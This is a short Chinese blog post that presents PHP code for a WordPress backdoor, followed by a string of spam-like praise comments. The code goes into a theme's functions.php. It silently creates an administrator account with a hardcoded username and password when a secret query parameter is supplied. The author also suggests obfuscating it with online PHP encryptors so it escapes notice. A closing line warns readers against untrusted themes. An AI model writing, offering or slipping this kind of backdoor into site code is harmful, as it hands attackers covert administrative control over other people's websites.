在WordPress主题中创建后门的方法

搬砖少年

无意中看到这样的代码，大家可以用作测试，但是千万别别有用心的整合到主题中。。（自己玩玩儿还行）
add_action( ‘wp_head’, ‘my_backdoor’ );
function my_backdoor() {
if ( md5( $_GET[‘backdoor’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’ ) {
require( ‘wp-includes/registration.php’ );
if ( !username_exists( ‘backdoor’ ) ) {
$user_id = wp_create_user( ‘backdoor’, ‘banzhuanboy.com’ );
$user = new WP_User( $user_id );
$user->set_role( ‘administrator’ );
}
}
}
例如在主题的 functions.php 文件中添加以上代码，就可以给 WordPress 添加一个能够创建管理员的后门，只需访问    搬砖少年 ，然后就创建了一个用户名为“backdoor”，密码为：“banzhuanboy.com” 的管理员。这样就OK了，但是对于有PHP基础的人，无疑是被发现的命运，那么我们再来给它加密，利用网上的在线PHP加密网站，我们可以很轻松的完成这个操作。
所以强烈建议大家不要随便去下载一些来路不明的 WordPress 主题和插件，说不定就给你的站点安装了一个后门。那我们的损失就打了去了~

搬砖少年原创文章，转载请注明来自
在WordPress主题中创建后门的方法

fcvbrls12

真心顶

小刚00

这个是好东西。

g5452wj4g

顶起顶起顶起

pi5aIndief

这个源码真好！

fsjit9y5q

专业抢沙发的！哈哈

g5452wj4g

很不错

dgk99r8d8r6

牛牛牛牛牛牛牛牛牛